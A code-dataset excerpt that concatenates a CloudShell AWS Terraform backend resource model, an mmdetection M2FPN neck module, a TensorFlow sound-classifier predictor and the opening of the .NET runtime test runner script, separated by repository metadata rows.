def console_user(self):
return self.attributes['Aws Tf Backend.Console User'] if 'Aws Tf Backend.Console User' in self.attributes else None
@console_user.setter
def console_user(self, value):
self.attributes['Aws Tf Backend.Console User'] = value
@property
def console_port(self):
return self.attributes['Aws Tf Backend.Console Port'] if 'Aws Tf Backend.Console Port' in self.attributes else None
@console_port.setter
def console_port(self, value):
self.attributes['Aws Tf Backend.Console Port'] = value
@property
def console_password(self):
return self.attributes['Aws Tf Backend.Console Password'] if 'Aws Tf Backend.Console Password' in self.attributes else None
@console_password.setter
def console_password(self, value):
self.attributes['Aws Tf Backend.Console Password'] = value
@property
def cli_connection_type(self):
return self.attributes['Aws Tf Backend.CLI Connection Type'] if 'Aws Tf Backend.CLI Connection Type' in self.attributes else None
@cli_connection_type.setter
def cli_connection_type(self, value='Auto'):
self.attributes['Aws Tf Backend.CLI Connection Type'] = value
@property
def cli_tcp_port(self):
return self.attributes['Aws Tf Backend.CLI TCP Port'] if 'Aws Tf Backend.CLI TCP Port' in self.attributes else None
@cli_tcp_port.setter
def cli_tcp_port(self, value):
self.attributes['Aws Tf Backend.CLI TCP Port'] = value
@property
def backup_location(self):
return self.attributes['Aws Tf Backend.Backup Location'] if 'Aws Tf Backend.Backup Location' in self.attributes else None
@backup_location.setter
def backup_location(self, value):
self.attributes['Aws Tf Backend.Backup Location'] = value
@property
def backup_type(self):
return self.attributes['Aws Tf Backend.Backup Type'] if 'Aws Tf Backend.Backup Type' in self.attributes else None
@backup_type.setter
def backup_type(self, value='File System'):
self.attributes['Aws Tf Backend.Backup Type'] = value
@property
def backup_user(self):
return self.attributes['Aws Tf Backend.Backup User'] if 'Aws Tf Backend.Backup User' in self.attributes else None
@backup_user.setter
def backup_user(self, value):
self.attributes['Aws Tf Backend.Backup User'] = value
@property
def backup_password(self):
return self.attributes['Aws Tf Backend.Backup Password'] if 'Aws Tf Backend.Backup Password' in self.attributes else None
@backup_password.setter
def backup_password(self, value):
self.attributes['Aws Tf Backend.Backup Password'] = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def cloudshell_model_name(self):
return self._cloudshell_model_name
@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
self._cloudshell_model_name = value
@property
def system_name(self):
return self.attributes['CS_GenericResource.System Name'] if 'CS_GenericResource.System Name' in self.attributes else None
@system_name.setter
def system_name(self, value):
self.attributes['CS_GenericResource.System Name'] = value
@property
def vendor(self):
return self.attributes['CS_GenericResource.Vendor'] if 'CS_GenericResource.Vendor' in self.attributes else None
@vendor.setter
def vendor(self, value=''):
self.attributes['CS_GenericResource.Vendor'] = value
@property
def contact_name(self):
return self.attributes['CS_GenericResource.Contact Name'] if 'CS_GenericResource.Contact Name' in self.attributes else None
@contact_name.setter
def contact_name(self, value):
self.attributes['CS_GenericResource.Contact Name'] = value
@property
def location(self):
return self.attributes['CS_GenericResource.Location'] if 'CS_GenericResource.Location' in self.attributes else None
@location.setter
def location(self, value=''):
self.attributes['CS_GenericResource.Location'] = value
@property
def model(self):
return self.attributes['CS_GenericResource.Model'] if 'CS_GenericResource.Model' in self.attributes else None
@model.setter
def model(self, value=''):
self.attributes['CS_GenericResource.Model'] = value
@property
def model_name(self):
return self.attributes['CS_GenericResource.Model Name'] if 'CS_GenericResource.Model Name' in self.attributes else None
@model_name.setter
def model_name(self, value=''):
self.attributes['CS_GenericResource.Model Name'] = value
class ResourcePort(object):
def __init__(self, name):
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend.ResourcePort'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
result = ResourcePort(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
return 'ResourcePort'
@property
def mac_address(self):
return self.attributes['Aws Tf Backend.ResourcePort.MAC Address'] if 'Aws Tf Backend.ResourcePort.MAC Address' in self.attributes else None
@mac_address.setter
def mac_address(self, value=''):
self.attributes['Aws Tf Backend.ResourcePort.MAC Address'] = value
@property
def ipv4_address(self):
return self.attributes['Aws Tf Backend.ResourcePort.IPv4 Address'] if 'Aws Tf Backend.ResourcePort.IPv4 Address' in self.attributes else None
@ipv4_address.setter
def ipv4_address(self, value):
self.attributes['Aws Tf Backend.ResourcePort.IPv4 Address'] = value
@property
def ipv6_address(self):
return self.attributes['Aws Tf Backend.ResourcePort.IPv6 Address'] if 'Aws Tf Backend.ResourcePort.IPv6 Address' in self.attributes else None
@ipv6_address.setter
def ipv6_address(self, value):
self.attributes['Aws Tf Backend.ResourcePort.IPv6 Address'] = value
@property
def port_speed(self):
return self.attributes['Aws Tf Backend.ResourcePort.Port Speed'] if 'Aws Tf Backend.ResourcePort.Port Speed' in self.attributes else None
@port_speed.setter
def port_speed(self, value):
self.attributes['Aws Tf Backend.ResourcePort.Port Speed'] = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def cloudshell_model_name(self):
return self._cloudshell_model_name
@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
self._cloudshell_model_name = value
@property
def model_name(self):
return self.attributes['CS_Port.Model Name'] if 'CS_Port.Model Name' in self.attributes else None
@model_name.setter
def model_name(self, value=''):
self.attributes['CS_Port.Model Name'] = value
class GenericPowerPort(object):
def __init__(self, name):
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend.GenericPowerPort'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
result = GenericPowerPort(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
return 'GenericPowerPort'
@property
def model(self):
return self.attributes['Aws Tf Backend.GenericPowerPort.Model'] if 'Aws Tf Backend.GenericPowerPort.Model' in self.attributes else None
@model.setter
def model(self, value):
self.attributes['Aws Tf Backend.GenericPowerPort.Model'] = value
@property
def serial_number(self):
return self.attributes['Aws Tf Backend.GenericPowerPort.Serial Number'] if 'Aws Tf Backend.GenericPowerPort.Serial Number' in self.attributes else None
@serial_number.setter
def serial_number(self, value):
self.attributes['Aws Tf Backend.GenericPowerPort.Serial Number'] = value
@property
def version(self):
return self.attributes['Aws Tf Backend.GenericPowerPort.Version'] if 'Aws Tf Backend.GenericPowerPort.Version' in self.attributes else None
@version.setter
def version(self, value):
self.attributes['Aws Tf Backend.GenericPowerPort.Version'] = value
@property
def port_description(self):
return self.attributes['Aws Tf Backend.GenericPowerPort.Port Description'] if 'Aws Tf Backend.GenericPowerPort.Port Description' in self.attributes else None
@port_description.setter
def port_description(self, value):
self.attributes['Aws Tf Backend.GenericPowerPort.Port Description'] = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def cloudshell_model_name(self):
return self._cloudshell_model_name
@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
self._cloudshell_model_name = value
@property
def model_name(self):
return self.attributes['CS_PowerPort.Model Name'] if 'CS_PowerPort.Model Name' in self.attributes else None
@model_name.setter
def model_name(self, value=''):
self.attributes['CS_PowerPort.Model Name'] = value
| true | true |
f71031a3fd2f8846d71ea867cc54aa76a975b9a1 | 9,412 | py | Python | mmdet/models/necks/m2fpn.py | ningdez/Tianchi_Cancer_303 | 59e9b6f906e48e7508f455ce29b97d430791fcf5 | [
"MIT"
] | 2 | 2020-06-23T14:12:03.000Z | 2020-11-13T02:52:30.000Z | mmdet/models/necks/m2fpn.py | ningdez/Tianchi_Cancer_303 | 59e9b6f906e48e7508f455ce29b97d430791fcf5 | [
"MIT"
] | 1 | 2021-11-10T10:42:33.000Z | 2021-11-10T10:42:33.000Z | mmdet/models/necks/m2fpn.py | ningdez/Tianchi_Cancer_303 | 59e9b6f906e48e7508f455ce29b97d430791fcf5 | [
"MIT"
] | null | null | null | '''
This code is based on pytorch_ssd and RFBNet.
Details about the modules:
TUM - Thinned U-shaped Module
MLFPN - Multi-Level Feature Pyramid Network
M2Det - Multi-level Multi-scale single-shot object Detector
Author: Qijie Zhao (zhaoqijie@pku.edu.cn)
Finished Date: 01/17/2019
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import xavier_init
import warnings
warnings.filterwarnings('ignore')
from ..registry import NECKS
from ..utils import ConvModule
class TUM(nn.Module):
def __init__(self, first_level=True, input_planes=128, is_smooth=True, side_channel=512, scales=6,
conv_cfg=None,
norm_cfg=None
):
super(TUM, self).__init__()
self.is_smooth = is_smooth
self.side_channel = side_channel
self.input_planes = input_planes
self.planes = 2 * self.input_planes
self.first_level = first_level
self.scales = scales
self.in1 = input_planes + side_channel if not first_level else input_planes
self.layers = nn.Sequential()
self.layers.add_module('{}'.format(len(self.layers)), ConvModule(self.in1, self.planes, 3, 2, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg))
for i in range(self.scales - 2):
if not i == self.scales - 3:
self.layers.add_module(
'{}'.format(len(self.layers)),
ConvModule(self.planes, self.planes, 3, 2, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
else:
self.layers.add_module(
'{}'.format(len(self.layers)),
ConvModule(self.planes, self.planes, 3, 1, 0,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
self.toplayer = nn.Sequential(ConvModule(self.planes, self.planes, 1, 1, 0,conv_cfg=conv_cfg,norm_cfg=norm_cfg))
self.latlayer = nn.Sequential()
for i in range(self.scales - 2):
self.latlayer.add_module(
'{}'.format(len(self.latlayer)),
ConvModule(self.planes, self.planes, 3, 1, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
self.latlayer.add_module('{}'.format(len(self.latlayer)), ConvModule(self.in1, self.planes, 3, 1, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg))
if self.is_smooth:
smooth = list()
for i in range(self.scales - 1):
smooth.append(
ConvModule(self.planes, self.planes, 1, 1, 0,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
self.smooth = nn.Sequential(*smooth)
def _upsample_add(self, x, y, fuse_type='interp'):
_, _, H, W = y.size()
if fuse_type == 'interp':
return F.interpolate(x, size=(H, W), mode='nearest') + y
else:
raise NotImplementedError
# return nn.ConvTranspose2d(16, 16, 3, stride=2, padding=1)
def forward(self, x, y):
if not self.first_level:
x = torch.cat([x, y], 1)
conved_feat = [x]
for i in range(len(self.layers)):
x = self.layers[i](x)
conved_feat.append(x)
deconved_feat = [self.toplayer[0](conved_feat[-1])]
for i in range(len(self.latlayer)):
deconved_feat.append(
self._upsample_add(
deconved_feat[i], self.latlayer[i](conved_feat[len(self.layers) - 1 - i])
)
)
if self.is_smooth:
smoothed_feat = [deconved_feat[0]]
for i in range(len(self.smooth)):
smoothed_feat.append(
self.smooth[i](deconved_feat[i + 1])
)
return smoothed_feat
return deconved_feat
class SFAM(nn.Module):
def __init__(self, planes, num_levels, num_scales, compress_ratio=16):
super(SFAM, self).__init__()
self.planes = planes
self.num_levels = num_levels
self.num_scales = num_scales
self.compress_ratio = compress_ratio
self.fc1 = nn.ModuleList([nn.Conv2d(self.planes * self.num_levels,
self.planes * self.num_levels // 16,
1, 1, 0)] * self.num_scales)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.ModuleList([nn.Conv2d(self.planes * self.num_levels // 16,
self.planes * self.num_levels,
1, 1, 0)] * self.num_scales)
self.sigmoid = nn.Sigmoid()
self.avgpool = nn.AdaptiveAvgPool2d(1)
def forward(self, x):
attention_feat = []
for i, _mf in enumerate(x):
_tmp_f = self.avgpool(_mf)
_tmp_f = self.fc1[i](_tmp_f)
_tmp_f = self.relu(_tmp_f)
_tmp_f = self.fc2[i](_tmp_f)
_tmp_f = self.sigmoid(_tmp_f)
attention_feat.append(_mf * _tmp_f)
return attention_feat
@NECKS.register_module
class M2FPN(nn.Module):
def __init__(self,
num_levels = 8,
num_scales = 5,
sfam=False,
smooth=True,
in_channels = [512,2048],
out_channels=256, conv_cfg=None,
norm_cfg=None):
'''
M2Det: Multi-level Multi-scale single-shot object Detector
'''
super(M2FPN,self).__init__()
self.planes = out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.num_levels = num_levels
self.num_scales = num_scales
self.sfam = sfam
self.smooth = smooth
self.in_channels = in_channels
self.shallow_out =256
self.deep_out =512
self.construct_modules()
def construct_modules(self,):
# construct tums
for i in range(self.num_levels):
if i == 0:
setattr(self,
'unet{}'.format(i+1),
TUM(first_level=True,
input_planes=self.planes//2,
is_smooth=self.smooth,
scales=self.num_scales,
side_channel=512)) #side channel isn't fixed.
else:
setattr(self,
'unet{}'.format(i+1),
TUM(first_level=False,
input_planes=self.planes//2,
is_smooth=self.smooth,
scales=self.num_scales,
side_channel=self.planes))
self.reduce= ConvModule(self.in_channels[0], self.shallow_out, kernel_size=3, stride=1, padding=1)
self.up_reduce_1= ConvModule(self.in_channels[2], self.in_channels[1], kernel_size=1, stride=1)
self.up_reduce_2= ConvModule(self.in_channels[1], self.deep_out, kernel_size=1, stride=1)
self.Norm = nn.BatchNorm2d(256*8)
self.leach = nn.ModuleList([ConvModule(
self.deep_out+self.shallow_out,
self.planes//2,
kernel_size=(1,1),stride=(1,1))]*self.num_levels)
# construct localization and recognition layers
conv_out = nn.ModuleList()
for i in range(self.num_scales):
conv_out.append(nn.Conv2d(self.planes*self.num_levels,
self.planes,
3, 1, 1))
self.conv_out = nn.ModuleList(conv_out)
# construct SFAM module
if self.sfam:
self.sfam_module = SFAM(self.planes, self.num_levels, self.num_scales, compress_ratio=16)
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
xavier_init(m, distribution='uniform')
def forward(self,x):
assert len(x)==len(self.in_channels)
# loc,conf = list(),list()
# base_feats = list()
# if 'vgg' in self.net_family:
# for k in range(len(self.base)):
# x = self.base[k](x)
# if k in self.base_out:
# base_feats.append(x)
# elif 'res' in self.net_family:
# base_feats = self.base(x, self.base_out)
up_feats = x[1] + F.interpolate(self.up_reduce_1(x[2]),scale_factor=2,mode='nearest')
base_feature = torch.cat(
(self.reduce(x[0]), F.interpolate(self.up_reduce_2(up_feats),scale_factor=2,mode='nearest')),1
)
# tum_outs is the multi-level multi-scale feature
tum_outs = [getattr(self, 'unet{}'.format(1))(self.leach[0](base_feature), 'none')]
for i in range(1,self.num_levels,1):
tum_outs.append(
getattr(self, 'unet{}'.format(i+1))(
self.leach[i](base_feature), tum_outs[i-1][-1]
)
)
# concat with same scales
sources = [torch.cat([_fx[i-1] for _fx in tum_outs],1) for i in range(self.num_scales, 0, -1)]
# forward_sfam
if self.sfam:
sources = self.sfam_module(sources)
sources[0] = self.Norm(sources[0])
output = []
for (x,cout) in zip(sources, self.conv_out):
output.append(cout(x))
return tuple(output)
| 39.881356 | 145 | 0.546855 | import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import xavier_init
import warnings
warnings.filterwarnings('ignore')
from ..registry import NECKS
from ..utils import ConvModule
class TUM(nn.Module):
def __init__(self, first_level=True, input_planes=128, is_smooth=True, side_channel=512, scales=6,
conv_cfg=None,
norm_cfg=None
):
super(TUM, self).__init__()
self.is_smooth = is_smooth
self.side_channel = side_channel
self.input_planes = input_planes
self.planes = 2 * self.input_planes
self.first_level = first_level
self.scales = scales
self.in1 = input_planes + side_channel if not first_level else input_planes
self.layers = nn.Sequential()
self.layers.add_module('{}'.format(len(self.layers)), ConvModule(self.in1, self.planes, 3, 2, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg))
for i in range(self.scales - 2):
if not i == self.scales - 3:
self.layers.add_module(
'{}'.format(len(self.layers)),
ConvModule(self.planes, self.planes, 3, 2, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
else:
self.layers.add_module(
'{}'.format(len(self.layers)),
ConvModule(self.planes, self.planes, 3, 1, 0,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
self.toplayer = nn.Sequential(ConvModule(self.planes, self.planes, 1, 1, 0,conv_cfg=conv_cfg,norm_cfg=norm_cfg))
self.latlayer = nn.Sequential()
for i in range(self.scales - 2):
self.latlayer.add_module(
'{}'.format(len(self.latlayer)),
ConvModule(self.planes, self.planes, 3, 1, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
self.latlayer.add_module('{}'.format(len(self.latlayer)), ConvModule(self.in1, self.planes, 3, 1, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg))
if self.is_smooth:
smooth = list()
for i in range(self.scales - 1):
smooth.append(
ConvModule(self.planes, self.planes, 1, 1, 0,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
self.smooth = nn.Sequential(*smooth)
def _upsample_add(self, x, y, fuse_type='interp'):
_, _, H, W = y.size()
if fuse_type == 'interp':
return F.interpolate(x, size=(H, W), mode='nearest') + y
else:
raise NotImplementedError
def forward(self, x, y):
if not self.first_level:
x = torch.cat([x, y], 1)
conved_feat = [x]
for i in range(len(self.layers)):
x = self.layers[i](x)
conved_feat.append(x)
deconved_feat = [self.toplayer[0](conved_feat[-1])]
for i in range(len(self.latlayer)):
deconved_feat.append(
self._upsample_add(
deconved_feat[i], self.latlayer[i](conved_feat[len(self.layers) - 1 - i])
)
)
if self.is_smooth:
smoothed_feat = [deconved_feat[0]]
for i in range(len(self.smooth)):
smoothed_feat.append(
self.smooth[i](deconved_feat[i + 1])
)
return smoothed_feat
return deconved_feat
class SFAM(nn.Module):
def __init__(self, planes, num_levels, num_scales, compress_ratio=16):
super(SFAM, self).__init__()
self.planes = planes
self.num_levels = num_levels
self.num_scales = num_scales
self.compress_ratio = compress_ratio
self.fc1 = nn.ModuleList([nn.Conv2d(self.planes * self.num_levels,
self.planes * self.num_levels // 16,
1, 1, 0)] * self.num_scales)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.ModuleList([nn.Conv2d(self.planes * self.num_levels // 16,
self.planes * self.num_levels,
1, 1, 0)] * self.num_scales)
self.sigmoid = nn.Sigmoid()
self.avgpool = nn.AdaptiveAvgPool2d(1)
def forward(self, x):
attention_feat = []
for i, _mf in enumerate(x):
_tmp_f = self.avgpool(_mf)
_tmp_f = self.fc1[i](_tmp_f)
_tmp_f = self.relu(_tmp_f)
_tmp_f = self.fc2[i](_tmp_f)
_tmp_f = self.sigmoid(_tmp_f)
attention_feat.append(_mf * _tmp_f)
return attention_feat
@NECKS.register_module
class M2FPN(nn.Module):
def __init__(self,
num_levels = 8,
num_scales = 5,
sfam=False,
smooth=True,
in_channels = [512,2048],
out_channels=256, conv_cfg=None,
norm_cfg=None):
super(M2FPN,self).__init__()
self.planes = out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.num_levels = num_levels
self.num_scales = num_scales
self.sfam = sfam
self.smooth = smooth
self.in_channels = in_channels
self.shallow_out =256
self.deep_out =512
self.construct_modules()
def construct_modules(self,):
for i in range(self.num_levels):
if i == 0:
setattr(self,
'unet{}'.format(i+1),
TUM(first_level=True,
input_planes=self.planes//2,
is_smooth=self.smooth,
scales=self.num_scales,
side_channel=512))
else:
setattr(self,
'unet{}'.format(i+1),
TUM(first_level=False,
input_planes=self.planes//2,
is_smooth=self.smooth,
scales=self.num_scales,
side_channel=self.planes))
self.reduce= ConvModule(self.in_channels[0], self.shallow_out, kernel_size=3, stride=1, padding=1)
self.up_reduce_1= ConvModule(self.in_channels[2], self.in_channels[1], kernel_size=1, stride=1)
self.up_reduce_2= ConvModule(self.in_channels[1], self.deep_out, kernel_size=1, stride=1)
self.Norm = nn.BatchNorm2d(256*8)
self.leach = nn.ModuleList([ConvModule(
self.deep_out+self.shallow_out,
self.planes//2,
kernel_size=(1,1),stride=(1,1))]*self.num_levels)
# construct localization and recognition layers
conv_out = nn.ModuleList()
for i in range(self.num_scales):
conv_out.append(nn.Conv2d(self.planes*self.num_levels,
self.planes,
3, 1, 1))
self.conv_out = nn.ModuleList(conv_out)
# construct SFAM module
if self.sfam:
self.sfam_module = SFAM(self.planes, self.num_levels, self.num_scales, compress_ratio=16)
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
xavier_init(m, distribution='uniform')
def forward(self,x):
assert len(x)==len(self.in_channels)
# loc,conf = list(),list()
# base_feats = list()
# if 'vgg' in self.net_family:
# for k in range(len(self.base)):
# x = self.base[k](x)
# if k in self.base_out:
# base_feats.append(x)
# elif 'res' in self.net_family:
# base_feats = self.base(x, self.base_out)
up_feats = x[1] + F.interpolate(self.up_reduce_1(x[2]),scale_factor=2,mode='nearest')
base_feature = torch.cat(
(self.reduce(x[0]), F.interpolate(self.up_reduce_2(up_feats),scale_factor=2,mode='nearest')),1
)
# tum_outs is the multi-level multi-scale feature
tum_outs = [getattr(self, 'unet{}'.format(1))(self.leach[0](base_feature), 'none')]
for i in range(1,self.num_levels,1):
tum_outs.append(
getattr(self, 'unet{}'.format(i+1))(
self.leach[i](base_feature), tum_outs[i-1][-1]
)
)
# concat with same scales
sources = [torch.cat([_fx[i-1] for _fx in tum_outs],1) for i in range(self.num_scales, 0, -1)]
# forward_sfam
if self.sfam:
sources = self.sfam_module(sources)
sources[0] = self.Norm(sources[0])
output = []
for (x,cout) in zip(sources, self.conv_out):
output.append(cout(x))
return tuple(output)
| true | true |
f710330a49da0167ad8b2a80e0fe83ccfd86d6d1 | 41 | py | Python | src/infrastructure/db/models/__init__.py | oliveirahelena/flask-boilerplate | e614ad65f60d5ae04f94ba8e2f7c00d5821cf41f | [
"MIT"
] | null | null | null | src/infrastructure/db/models/__init__.py | oliveirahelena/flask-boilerplate | e614ad65f60d5ae04f94ba8e2f7c00d5821cf41f | [
"MIT"
] | null | null | null | src/infrastructure/db/models/__init__.py | oliveirahelena/flask-boilerplate | e614ad65f60d5ae04f94ba8e2f7c00d5821cf41f | [
"MIT"
] | null | null | null | from .orm import metadata, start_mappers
| 20.5 | 40 | 0.829268 | from .orm import metadata, start_mappers
| true | true |
f71033e02a6b94c708b484a5a8b6d3a055181306 | 881 | py | Python | test/apis/tensorflow/sound-classifier/predictor.py | wja30/cortex_0.31 | 522ec6226526dee6b4f8c3ed67bdf2b913d25de3 | [
"Apache-2.0"
] | 1 | 2020-09-09T04:04:30.000Z | 2020-09-09T04:04:30.000Z | test/apis/tensorflow/sound-classifier/predictor.py | wja30/cortex_0.31 | 522ec6226526dee6b4f8c3ed67bdf2b913d25de3 | [
"Apache-2.0"
] | null | null | null | test/apis/tensorflow/sound-classifier/predictor.py | wja30/cortex_0.31 | 522ec6226526dee6b4f8c3ed67bdf2b913d25de3 | [
"Apache-2.0"
] | null | null | null | from scipy.io.wavfile import read
import numpy as np
import io
import csv
class TensorFlowPredictor:
def __init__(self, tensorflow_client, config):
self.client = tensorflow_client
self.class_names = self.class_names_from_csv("class_names.csv")
def class_names_from_csv(self, csv_file):
class_names = []
with open(csv_file, "r", newline="") as f:
for row in csv.reader(f, delimiter=","):
class_names.append(row[2])
return class_names
def predict(self, payload):
rate, data = read(io.BytesIO(payload))
assert rate == 16000
result = self.client.predict({"waveform": np.array(data, dtype=np.float32)})
scores = np.array(result["output_0"]).reshape((-1, 521))
predicted_class = self.class_names[scores.mean(axis=0).argmax() + 1]
return predicted_class
| 31.464286 | 84 | 0.648127 | from scipy.io.wavfile import read
import numpy as np
import io
import csv
class TensorFlowPredictor:
def __init__(self, tensorflow_client, config):
self.client = tensorflow_client
self.class_names = self.class_names_from_csv("class_names.csv")
def class_names_from_csv(self, csv_file):
class_names = []
with open(csv_file, "r", newline="") as f:
for row in csv.reader(f, delimiter=","):
class_names.append(row[2])
return class_names
def predict(self, payload):
rate, data = read(io.BytesIO(payload))
assert rate == 16000
result = self.client.predict({"waveform": np.array(data, dtype=np.float32)})
scores = np.array(result["output_0"]).reshape((-1, 521))
predicted_class = self.class_names[scores.mean(axis=0).argmax() + 1]
return predicted_class
| true | true |
f710345e83902ad2ce3264936bfc7be3a0d99f86 | 62,597 | py | Python | src/tests/run.py | watfordgnf/runtime | 301056d6ff8f5ac0dea7fe07a8b450754ad846cb | [
"MIT"
] | 1 | 2020-12-02T16:42:26.000Z | 2020-12-02T16:42:26.000Z | src/tests/run.py | watfordgnf/runtime | 301056d6ff8f5ac0dea7fe07a8b450754ad846cb | [
"MIT"
] | 1 | 2020-12-02T09:16:02.000Z | 2020-12-02T09:16:02.000Z | src/tests/run.py | watfordgnf/runtime | 301056d6ff8f5ac0dea7fe07a8b450754ad846cb | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
## Licensed to the .NET Foundation under one or more agreements.
## The .NET Foundation licenses this file to you under the MIT license.
#
##
# Title: run.py
#
# Notes:
#
# Universal script to setup and run the xunit console runner. The script relies
# on run.proj and the bash and batch wrappers. All test excludes will also
# come from issues.targets. If there is a jit stress or gc stress exclude,
# please add GCStressIncompatible or JitOptimizationSensitive to the test's
# ilproj or csproj.
#
# The xunit runner currently relies on tests being built on the same host as the
# target platform. This requires all tests run on linux x64 to be built by the
# same platform and arch. If this is not done, the tests will run correctly;
# however, expect failures due to incorrect exclusions in the xunit
# wrappers setup at build time.
#
# Note that for linux targets the native components to the tests are still built
# by the product build. This requires all native components to be either copied
# into the Core_Root directory or the test's managed directory. The latter is
# prone to failure; however, copying into the Core_Root directory may create
# naming conflicts.
#
# If you are running tests on a different target than the host that built, the
# native tests components must be copied from:
# artifacts/obj/<OS>.<Arch>.<BuildType>/tests to the target. If the location is not
# standard please pass the -test_native_bin_location flag to the script.
#
# Use the instructions here:
# https://github.com/dotnet/runtime/blob/master/docs/workflow/testing/coreclr/windows-test-instructions.md
# https://github.com/dotnet/runtime/blob/master/docs/workflow/testing/coreclr/unix-test-instructions.md
#
################################################################################
################################################################################
import argparse
import datetime
import fnmatch
import json
import math
import os
import platform
import shutil
import subprocess
import sys
import tempfile
import time
import re
import string
import zipfile
import xml.etree.ElementTree
from collections import defaultdict
from sys import platform as _platform
# Version specific imports
if sys.version_info.major < 3:
import urllib
else:
import urllib.request
# Import coreclr_arguments.py from src\coreclr\scripts
sys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "coreclr", "scripts"))
from coreclr_arguments import *
################################################################################
# Argument Parser
################################################################################
description = ("""Universal script to setup and run the xunit console runner. The script relies
on run.proj and the bash and batch wrappers. All test excludes will also
come from issues.targets. If there is a jit stress or gc stress exclude,
please add GCStressIncompatible or JitOptimizationSensitive to the test's
ilproj or csproj.
The xunit runner currently relies on tests being built on the same host as the
target platform. This requires all tests run on linux x64 to be built by the
same platform and arch. If this is not done, the tests will run correctly;
however, expect failures due to incorrect exclusions in the xunit
wrappers setup at build time.
Note that for linux targets the native components to the tests are still built
by the product build. This requires all native components to be either copied
into the Core_Root directory or the test's managed directory. The latter is
prone to failure; however, copying into the Core_Root directory may create
naming conflicts.
If you are running tests on a different target than the host that built, the
native tests components must be copied from:
artifacts/obj/<OS>.<Arch>.<BuildType>/tests to the target. If the location is not
standard please pass the -test_native_bin_location flag to the script.""")
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-os", dest="host_os", nargs='?', default=None)
parser.add_argument("-arch", dest="arch", nargs='?', default="x64")
parser.add_argument("-build_type", dest="build_type", nargs='?', default="Debug")
parser.add_argument("-test_location", dest="test_location", nargs="?", default=None)
parser.add_argument("-core_root", dest="core_root", nargs='?', default=None)
parser.add_argument("-product_location", dest="product_location", nargs='?', default=None)
parser.add_argument("-runtime_repo_location", dest="runtime_repo_location", default=os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
parser.add_argument("-test_env", dest="test_env", default=None)
parser.add_argument("-crossgen_altjit", dest="crossgen_altjit", default=None)
# Optional arguments which change execution.
# Rid is used only for restoring packages. This is a unspecified and undocumented
# environment variable that needs to be passed to build.proj. Do not use this
# unless you are attempting to target package restoration for another host/arch/os
parser.add_argument("-rid", dest="rid", nargs="?", default=None)
parser.add_argument("--il_link", dest="il_link", action="store_true", default=False)
parser.add_argument("--long_gc", dest="long_gc", action="store_true", default=False)
